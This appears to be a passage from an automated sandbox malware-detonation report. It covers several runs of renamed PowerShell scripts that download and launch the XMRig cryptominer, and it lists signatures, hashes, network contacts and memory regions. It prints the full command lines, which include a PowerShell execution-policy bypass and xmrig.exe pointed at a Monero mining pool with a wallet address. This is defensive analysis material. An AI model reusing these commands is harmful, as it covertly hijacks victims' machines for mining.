memory/5024-55-0x00000233D0670000-0x00000233D0690000-memory.dmp
memory/5024-54-0x00000233D0650000-0x00000233D0670000-memory.dmp
memory/5024-56-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/4888-57-0x00007FFD92FD0000-0x00007FFD93A91000-memory.dmp
memory/4888-60-0x00007FFD92FD0000-0x00007FFD93A91000-memory.dmp
memory/5024-59-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-62-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-63-0x00000233D0650000-0x00000233D0670000-memory.dmp
memory/5024-64-0x00000233D0670000-0x00000233D0690000-memory.dmp
memory/5024-66-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-68-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-70-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-72-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-74-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-76-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-78-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-80-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-82-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-84-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-86-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-88-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-90-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-92-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-94-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-96-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-98-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-100-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-102-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-104-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-106-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-108-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-110-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-112-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-114-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-116-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/5024-118-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:41
Platform
win11-20240419-en
Max time kernel
1798s
Max time network
1788s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2440 wrote to memory of 2812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2440 wrote to memory of 2812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/2440-0-0x00007FF8A3873000-0x00007FF8A3875000-memory.dmp
memory/2440-1-0x0000024EEC3B0000-0x0000024EEC3D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ih3wf0mu.ids.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2440-10-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp
memory/2440-11-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp
memory/2440-12-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp
memory/2440-14-0x0000024EEC720000-0x0000024EEC732000-memory.dmp
memory/2440-15-0x0000024EEC400000-0x0000024EEC40A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2812-46-0x00000277B4C70000-0x00000277B4C90000-memory.dmp
memory/2812-47-0x0000027848420000-0x0000027848440000-memory.dmp
memory/2812-48-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2440-49-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp
memory/2812-51-0x0000027848A90000-0x0000027848AB0000-memory.dmp
memory/2812-50-0x0000027848860000-0x0000027848880000-memory.dmp
memory/2812-52-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2440-53-0x00007FF8A3873000-0x00007FF8A3875000-memory.dmp
memory/2440-54-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp
memory/2812-55-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-57-0x0000027848860000-0x0000027848880000-memory.dmp
memory/2812-58-0x0000027848A90000-0x0000027848AB0000-memory.dmp
memory/2812-56-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-59-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-60-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-61-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-62-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-63-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-64-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-65-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-66-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-67-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-68-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-69-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-70-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-71-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-72-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-73-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-74-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-75-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-76-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-77-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-78-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-79-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-80-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-81-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-82-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-83-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-84-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-85-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-86-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-87-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-88-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-89-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-90-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-91-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-92-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-93-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-94-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-95-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-96-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-97-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-98-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-99-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-100-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-101-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-102-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-103-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-104-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-105-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-106-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-107-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-108-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-109-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-110-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-111-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-112-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-113-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-114-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-115-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-116-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-117-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:21
Platform
win7-20240221-en
Max time kernel
1563s
Max time network
1563s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
Network
Files
memory/1040-4-0x000007FEF5D1E000-0x000007FEF5D1F000-memory.dmp
memory/1040-5-0x000000001B7C0000-0x000000001BAA2000-memory.dmp
memory/1040-6-0x0000000001ED0000-0x0000000001ED8000-memory.dmp
memory/1040-8-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp
memory/1040-9-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp
memory/1040-7-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp
memory/1040-10-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp
memory/1040-11-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp
memory/1040-12-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:35
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1780s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2540 wrote to memory of 1908 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2540 wrote to memory of 1908 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
Files
memory/2540-0-0x00007FFE97363000-0x00007FFE97365000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pch1fkdj.mxz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2540-10-0x0000022636160000-0x0000022636182000-memory.dmp
memory/2540-11-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp
memory/2540-12-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp
memory/2540-14-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp
memory/2540-16-0x00000226361A0000-0x00000226361AA000-memory.dmp
memory/2540-15-0x0000022636BB0000-0x0000022636BC2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1908-47-0x00000215CD8B0000-0x00000215CD8D0000-memory.dmp
memory/1908-48-0x0000021661300000-0x0000021661320000-memory.dmp
memory/1908-49-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/2540-51-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp
memory/1908-50-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-54-0x0000021661970000-0x0000021661990000-memory.dmp
memory/1908-53-0x0000021661740000-0x0000021661760000-memory.dmp
memory/2540-52-0x00007FFE97363000-0x00007FFE97365000-memory.dmp
memory/2540-55-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp
memory/1908-56-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-57-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-58-0x0000021661740000-0x0000021661760000-memory.dmp
memory/1908-59-0x0000021661970000-0x0000021661990000-memory.dmp
memory/1908-60-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-61-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-62-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-63-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-64-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-65-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-66-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-67-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-68-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-69-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-70-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-71-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-72-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-73-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-74-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-75-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-76-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-77-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-78-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-79-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-80-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-81-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-82-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-83-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-84-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-85-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-86-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-87-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-88-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-89-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-90-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-91-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-92-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-93-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-94-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-95-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-96-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-97-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-98-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-99-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-100-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-101-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-102-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-103-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-104-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-105-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-106-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-107-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-108-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-109-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-110-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-111-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-112-0x00007FF797D30000-0x00007FF798963000-memory.dmp
